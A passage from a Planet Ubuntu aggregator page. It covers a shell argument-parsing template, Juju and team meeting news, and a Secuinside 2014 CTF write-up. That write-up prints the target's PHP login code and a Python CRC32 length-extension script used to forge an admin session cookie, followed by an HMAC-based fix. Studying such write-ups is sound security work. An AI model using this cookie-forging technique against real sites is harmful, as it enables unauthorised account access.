output="-"
while [ $# -gt 0 ] ; do
    case "$1" in
    -h|--help)
        usage
        ;;
    -d|--delete)
        delete=1
        ;;
    -o|--output)
        output="$2"
        shift
        ;;
    -*)
        usage "Unknown option '$1'"
        ;;
    *)
        if [ -z "$foo" ] ; then
            foo="$1"
        elif [ -z "$bar" ] ; then
            bar="$1"
        else
            usage "Too many arguments"
        fi
        ;;
    esac
    shift
done

if [ -z "$bar" ] ; then
    usage "Not enough arguments"
fi

cat <<EOF
foo=$foo
bar=$bar
delete=$delete
output=$output
EOF

Note: the die function is not used by the template itself, but most of the scripts I write need such a function at some point, which is why it is there.

This template supports:

  • Short and long options (-d and --delete for example)
  • Options with and without arguments
  • Arbitrary position for options: myscript foo -d will do the same as myscript -d foo
  • Aborting when invalid options are passed
  • Checks for mandatory positional arguments

This last feature is done in two parts. First the *) case in the while loop sets variables as it goes through arguments and aborts if too many arguments are passed. Once the code leaves the while loop, a check is done on the last argument: if it is empty the code aborts complaining about missing arguments.

Supporting a variable number of arguments

A common change is accepting a variable number of arguments. If you are confident your arguments will never contain spaces or other weird characters, then you can do the following changes:

  1. Declare an empty args variable before the while loop:

    args=""
  2. Replace the code in the *) case with something like this:

    *) args="$args $1" ;;
  3. Remove the check for the last argument or alter it to check if args is empty.

  4. Iterate over the arguments with:

    for arg in $args ; do
        # Do work here
    done

If you want to support arguments which contain spaces, that's another story. The simplest solution I know of is to make use of Bash arrays. The changes would thus look like this:

  1. Change the shebang to #!/bin/bash.

  2. Declare an empty args array before the while loop:

    args=()
  3. Replace the code in the *) case with something like this:

    *) args=("${args[@]}" "$1") ;;
  4. Same as before: remove the check for the last argument or alter it to check if args is empty. Note the double quotes around "${args[@]}": without them the existing elements would be word-split again when the array is rebuilt, and arguments containing spaces would be broken apart after all.

  5. Iterate over the arguments with:

    for arg in "${args[@]}" ; do
        # Do work here
    done

Higher percentage of cabalistic symbols in there, but that's the price one has to pay to manipulate arrays with Bash.

Pros and cons

Compared to getopt, this template has a few advantages but also limitations one must be aware of:

  • Pros
    • No need to list the options again in a call to getopt
    • Less boilerplate: getopt requires you to run it, then eval its output
    • Positional arguments are handled in the same loop which handles the options
  • Cons
    • No support for concatenated short options: -ab is not the same as -a -b.
    • No support for separating option arguments with an equal sign: you must write --output file.log and not --output=file.log.

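As an added example (not code from the original post), the template's while/case loop rewritten as a function that fills the same variables (foo, bar, delete, output) and also removes the two limitations listed under Cons: "--output=FILE" and concatenated short options such as "-do FILE". It stays POSIX sh and returns 1 instead of calling usage(), so the caller decides what to do on bad input.

```shell
#!/bin/sh
# Added example, not from the original post.  Same variables as the template;
# extra cases handle "--output=FILE" and concatenated short options ("-do").

parse_args() {
    foo="" bar="" delete=0 output="-"
    while [ $# -gt 0 ] ; do
        case "$1" in
        -d|--delete)
            delete=1
            ;;
        -o|--output)
            # the value is the next word; refuse a dangling "-o"
            [ $# -ge 2 ] || { echo "Error: $1 needs an argument" >&2 ; return 1 ; }
            output="$2"
            shift
            ;;
        --output=*)
            # "--output=FILE": strip the prefix to get the value
            output="${1#--output=}"
            ;;
        -[!-]?*)
            # concatenated short options: split "-do" into "-d" and "-o",
            # push them back onto the argument list and re-enter the loop
            rest="${1#-}"
            first="${rest%"${rest#?}"}"   # first character after the dash
            rest="${rest#?}"              # everything after it
            shift
            set -- "-$first" "-$rest" "$@"
            continue
            ;;
        -*)
            echo "Error: Unknown option '$1'" >&2
            return 1
            ;;
        *)
            # positional arguments, in order, exactly as in the template
            if [ -z "$foo" ] ; then
                foo="$1"
            elif [ -z "$bar" ] ; then
                bar="$1"
            else
                echo "Error: Too many arguments" >&2
                return 1
            fi
            ;;
        esac
        shift
    done
    # mandatory positional check: bar is only ever filled after foo
    if [ -z "$bar" ] ; then
        echo "Error: Not enough arguments" >&2
        return 1
    fi
    return 0
}

# Stand-alone demonstration; "first arg" contains a space and survives intact.
if parse_args -do out.log "first arg" second ; then
    printf 'foo=%s\nbar=%s\ndelete=%s\noutput=%s\n' "$foo" "$bar" "$delete" "$output"
fi
```
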
That's it for this template, hope it is useful to you.

Jorge Castro: Juju is now on Github

Planet Ubuntu - Wed, 2014-06-04 13:55

We’ve got some changes in Juju and the Juju ecosystem that have been landing this week.

Ian Booth announced the move of Juju core to github.com. You can find all our work at: https://github.com/juju.

Workflow instructions for contributing are available in the CONTRIBUTING file. Ian also adds:

Once the dust settles on the migration of juju-core, we’ll also be migrating various dependencies like goose, gwacl, gomaasapi and golxc.

You can find the code for Juju Core at: https://github.com/juju/juju

On a related note, we have a one way mirror of the Juju Charm Store as well: https://github.com/charms

You can combine these with Francesco Banconi’s git-deploy plugin to deploy right from github, as an example:

juju git-deploy charms/mysql

Hopefully 2-way syncing will be possible soon, stay tuned!

David Murphy: Enabling Students in a Digital Age: Charlie Reisinger at TEDxLancaster

Planet Ubuntu - Wed, 2014-06-04 13:44

This is really inspiring to me, on several levels: as an Ubuntu member, as a Canonical employee, and as a school governor.

Not only are they deploying Ubuntu and other open-source software to their students, they are encouraging those students to tinker with their laptops, and – better yet – some of those same students are directly involved in the development, distribution, and providing support for their peers. All of those students will take incredibly valuable experience with them into their future careers.

Well done.


David Tomaschik: Secuinside Quals 2014: Simple Login

Planet Ubuntu - Wed, 2014-06-04 02:08

In this challenge, we received the source for a site with a pretty basic login functionality. Aside from some boring forms, javascript, and css, we have this PHP library for handling the session management:

<?
class common{
    public function getidx($id){
        $id = mysql_real_escape_string($id);
        $info = mysql_fetch_array(mysql_query("select idx from member where id='".$id."'"));
        return $info[0];
    }

    public function getpasswd($id){
        $id = mysql_real_escape_string($id);
        $info = mysql_fetch_array(mysql_query("select password from member where id='".$id."'"));
        return $info[0];
    }

    public function islogin(){
        if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){
            exit("cannot be used Special character");
        }
        if( $_COOKIE['user_name'] == "admin" ) return 0;

        $salt = file_get_contents("../../long_salt.txt");
        if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){
            return 1;
        }
        return 0;
    }

    public function autologin(){
    }

    public function isadmin(){
        if( $this->getidx($_COOKIE['user_name']) == 1){
            return 1;
        }
        return 0;
    }

    public function insertmember($id, $password){
        $id = mysql_real_escape_string($id);
        mysql_query("insert into member(id, password) values('".$id."', '".$password."')") or die();
        return 1;
    }
}
?>

Some first impressions:

  • MySQL calls seem to be properly escaped.
  • The auth cookie is using the super-weak crc32.
  • Setting the user_name cookie to 'admin' won't work out for us.

In index.php, we see:

if($common->islogin()){
    if($common->isadmin())
        $f = "Flag is : ".__FLAG__;
    else
        $f = "Hello, Guest!";

So, presumably, the correct user is actually 'admin', but we can't log in as that. So what to do? Well, after playing around for a bit, I realized one important point. By default, MySQL uses case-insensitive string comparisons but, of course, PHP's == operator is case-sensitive. So a mixed-case version of admin will pass the test in islogin() but will return the user we want in getidx(), but we can't log in as any variation of admin as the password will still be needed.

That brings us to the hash. Perhaps we could fake the hash for an uppercased admin user? While we could probably brute force the salt, that would take a while. However, crc32 is vulnerable to trivial hash length extension attacks, if you can set the internal state to an existing hash. That is: crc32(a+b) == crc32(b, crc32(a)). So, since the salt is at the beginning, if we have the crc32 for a user, we can easily concatenate anything on the end and still generate a valid hash. (Assuming an implementation of crc32 that allows you to set the existing internal state.)

One rub: while python allows you to set the state, it doesn't implement the same CRC-32 as PHP! (I thought there was only one CRC-32, but apparently the one in python's binascii and zlib modules is the zlib CRC-32, and the PHP hash one is the bz2 CRC-32.) So I was able to find the relevant lookup table for the BZ2 crc-32 and write this implementation:

import struct

crc_table = [
    0x00000000L, 0x04c11db7L, 0x09823b6eL, 0x0d4326d9L,
    ...snip...
    0xbcb4666dL, 0xb8757bdaL, 0xb5365d03L, 0xb1f740b4L
]

def bzcrc(s, init=None):
    if init:
        # resume from an existing PHP hash: undo the byte order and final inversion
        state = struct.unpack('>I', struct.pack('<I', ~init & 0xffffffff))[0]
    else:
        state = 0xffffffff
    for c in s:
        state = state & 0xffffffff
        state = ((state << 8) ^ (crc_table[(state >> 24) ^ (ord(c))]))
    # invert and swap back into the byte order PHP's hash('crc32') prints
    return hex(struct.unpack('>I', struct.pack('<I', ~state & 0xffffffff))[0])

And yes, I do some weird stuff with byte-order swapping, but it works for the one-off. So, we logged in as the user 'a', got a hash, then changed the user_name cookie to aDMIN, and calculated the new hash via: bzcrc('DMIN', <existing hash>). Updated the hash cookie, refreshed, and we've got a flag.
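The property the writeup relies on, and the fix, as an added Python 3 example (not the author's bzcrc() or the challenge code): a table-free CRC-32/BZIP2 (the MSB-first, polynomial 0x04C11DB7 variant behind PHP's hash('crc32')) whose register can be re-entered from any published value, so the salt never has to be known, beside a keyed HMAC-SHA256 replacement that has no such property. The salt is constructed for the demonstration; the HMAC scheme is a swapped-in mitigation, not what the challenge used.

```python
import hashlib
import hmac

# Added example, not the author's or the challenge's code.  CRC-32/BZIP2:
# MSB-first, poly 0x04C11DB7, init 0xFFFFFFFF, final XOR 0xFFFFFFFF,
# check value for b"123456789" is 0xFC891918.
POLY = 0x04C11DB7
MASK = 0xFFFFFFFF

# Build the 256-entry table from the polynomial instead of pasting it in.
_TABLE = []
for i in range(256):
    reg = i << 24
    for _ in range(8):
        reg = ((reg << 1) ^ POLY) if reg & 0x80000000 else (reg << 1)
        reg &= MASK
    _TABLE.append(reg)


def crc_update(register: int, data: bytes) -> int:
    """Feed bytes through the CRC register (no bit reflection)."""
    for byte in data:
        register = ((register << 8) & MASK) ^ _TABLE[(register >> 24) ^ byte]
    return register


def crc32_bzip2(data: bytes) -> int:
    """Finished CRC: start from the init value, apply the final XOR."""
    return crc_update(MASK, data) ^ MASK


def extend_crc(known_crc: int, suffix: bytes) -> int:
    """crc(prefix + suffix) from crc(prefix) alone.

    Undoing the final XOR recovers the exact register state, so feeding more
    bytes continues the computation.  The prefix (here the secret salt) is
    never needed, which is why a CRC cannot serve as a cookie authenticator.
    """
    return crc_update(known_crc ^ MASK, suffix) ^ MASK


def sign_cookie(key: bytes, login_time: int, user: str) -> str:
    """Keyed replacement for hash('crc32', salt|time|user)."""
    msg = f"{login_time}|{user}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def verify_cookie(key: bytes, login_time: int, user: str, tag: str) -> bool:
    """Constant-time check; a tag for 'a' says nothing about a tag for 'aDMIN'."""
    return hmac.compare_digest(sign_cookie(key, login_time, user), tag)


if __name__ == "__main__":
    SALT = b"constructed-demo-salt"          # stands in for long_salt.txt
    issued = crc32_bzip2(SALT + b"|1|a")     # value the site hands user 'a'
    extended = extend_crc(issued, b"DMIN")   # continued without the salt
    print(extended == crc32_bzip2(SALT + b"|1|aDMIN"))   # True: CRC extends
    tag = sign_cookie(SALT, 1, "a")
    print(verify_cookie(SALT, 1, "aDMIN", tag))          # False: HMAC does not
```

The author's bzcrc() swaps bytes on the way in and out because PHP's hash('crc32') prints this same 32-bit value byte-reversed; the integer form above is used so the extension step is visible without that detail.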

Ubuntu Server blog: Meeting Minutes: June 3rd, 2014

Planet Ubuntu - Tue, 2014-06-03 19:27
Agenda
  • Review ACTION points from previous meeting
  • U Development
  • Server & Cloud Bugs (caribou)
  • Weekly Updates & Questions for the QA Team (psivaa)
  • Weekly Updates & Questions for the Kernel Team (smb, sforshee)
  • Ubuntu Server Team Events
  • Open Discussion
  • Announce next meeting date, time and chair
Minutes
  • vUDS is next week (Tues-Thurs) – Pat (gaughen) is still working on topics, so if someone has a suggestion please talk to her.
  • bug 1319555 should not be on the list – list needs refreshing
  • bug 1315052 has fix committed upstream
  • bug 1317587 is in progress
  • The team is working on getting the blueprints filled out completely.  Expecting them to be solidified around vUDS.
  • Louis (caribou) created blueprint: https://blueprints.launchpad.net/ubuntu/+spec/servercloud-u-networked-kdump and working on getting it filled in and approved.
  • kdump may be added to vUDS agenda
  • There’s an Openstack meetup in London on Thursday – James (jamespage) and Liam (gnuoy) are attending.  http://www.eventbooking.uk.com/openstack/home.html
Next Meeting

Next meeting will be on Tuesday, June 10th at 16:00 UTC in #ubuntu-meeting.

Additional logs @ https://wiki.ubuntu.com/MeetingLogs/Server/20140603

Ubuntu Kernel Team: Kernel Team Meeting Minutes – June 03, 2014

Planet Ubuntu - Tue, 2014-06-03 17:13
Meeting Minutes

IRC Log of the meeting.

Meeting minutes.

Agenda

20140603 Meeting Agenda


ARM Status

No new update this week.


Release Metrics and Incoming Bugs

Release metrics and incoming bug data can be reviewed at the following link:

http://people.canonical.com/~kernel/reports/kt-meeting.txt


Milestone Targeted Work Items

  • apw: core-1405-kernel, 2 work items
  • ogasawara: core-1405-kernel, 2 work items


Status: Utopic Development Kernel

We have most recently rebased our Utopic kernel to v3.15-rc8 and
uploaded (3.15.0-5.10). We are planning on converging on the v3.16
kernel for Utopic. It also appears that the Utopic release date has
been pushed out a week to Thurs Oct 23 in order to not conflict with
the Linux Plumbers Conference.
—–
Important upcoming dates:
Mon-Wed June 10 – 12, UOS – Ubuntu Online Summit (~1 week away)
Thurs Jun 26 – Alpha 1 (~3 weeks away)
Fri Jun 27 – Kernel Freeze for 12.04.5 and 14.04.1 (~3 weeks away)


Status: CVE’s

The current CVE status can be reviewed at the following link:

http://people.canonical.com/~kernel/cve/pkg/ALL-linux.html


Status: Stable, Security, and Bugfix Kernel Updates – Trusty/Saucy/Precise/Lucid

Status for the main kernels, until today (June 3):

  • Lucid – Verification and Testing
  • Precise – Verification and Testing
  • Quantal – No changes this cycle
  • Saucy – Verification and Testing
  • Trusty – Verification and Testing

    Current opened tracking bugs details:

  • http://people.canonical.com/~kernel/reports/kernel-sru-workflow.html

    For SRUs, SRU report is a good source of information:

  • http://people.canonical.com/~kernel/reports/sru-report.html

    Schedule:

    cycle: 18-May through 07-Jun
    ====================================================================
    16-May Last day for kernel commits for this cycle
    18-May – 24-May Kernel prep week.
    25-May – 31-May Bug verification & Regression testing.
    01-Jun – 07-Jun Regression testing & Release to -updates.


Open Discussion or Questions? Raise your hand to be recognized

No open discussions.

David Planella: A new era for the Ubuntu community team, or business as usual

Planet Ubuntu - Tue, 2014-06-03 17:06

A sample of the wider Ubuntu Community team, with Canonicalers and volunteer core app developers

After the recent news of Jono stepping down as the Ubuntu Community Manager to seek new challenges at XPRIZE, a new era in Ubuntu begins. Jono’s leadership, passion and drive to continually push the boundaries have been contagious over the years, and have been the catalyst for growing the unique community of individuals that defines Ubuntu today.

Jono is now joining the ranks of non-Canonical Ubuntu members, and while this will change the angle of participation, I’m certain that it won’t change his energy and dedication one bit. But most importantly, it’s a testament to his work that his former team will continue to thrive and take up the torch in pushing those boundaries.

For us, it will be business as usual in the sense of implementing our roadmap, continuing to grow a strong and open community, being innovative in how we do it, and coordinating the logistics around our plans. So not much will be different in that regard, but obviously some organizational bits will change.

As part of the transition, the Ubuntu Community Team at Canonical in full, that is, Michael Hall, Daniel Holbach, Alan Pope, Nicholas Skaggs and myself, will now be hosting the weekly Ubuntu Q&A, starting today at 18:00 UTC on Ubuntu On Air (click here for the time at your location).

The Ubuntu Community Team Q&A

Openness, both in being a transparent and welcoming community, is one of the core values of Ubuntu, and we believe the channels should be always open for a healthy information flow and to help contributors get involved.

As such, the Ubuntu Community Team Q&A will continue to provide a weekly, 1-hour-long session open for participation to anyone who wants to ask their questions about Ubuntu. In fact, as in former editions, you can ask the Community Team just anything about Free Software, Technology, or whatever you come up with. As before, the only questions we won’t answer are those related to technical support, where you’ll be much better served using Ask Ubuntu, the Ubuntu forums or IRC.

Join the Ubuntu Community Team Q&A at 18:00 UTC today and ask your questions.

The Ubuntu Online Summit is coming soon!

Also, following the thread of events and participation, the new Ubuntu Online Summit (UOS) is coming up very soon, and it’s an excellent opportunity to learn about getting involved in Ubuntu, organizing or presenting the plans of the different Ubuntu teams for the next months.

UOS will be held on June 10th – 12th and it will be a combination of the former Ubuntu Developer Summit and the more user-facing events we’ve been organizing in the past. This opens the door to a wider audience that can follow a richer mix of developer and user or contributor content.

If you want to learn about the details, check out Michael’s UOS post on how it’s going to work. If you want to contribute and make a difference in Ubuntu, do register a session too!

Looking forward to seeing you soon!

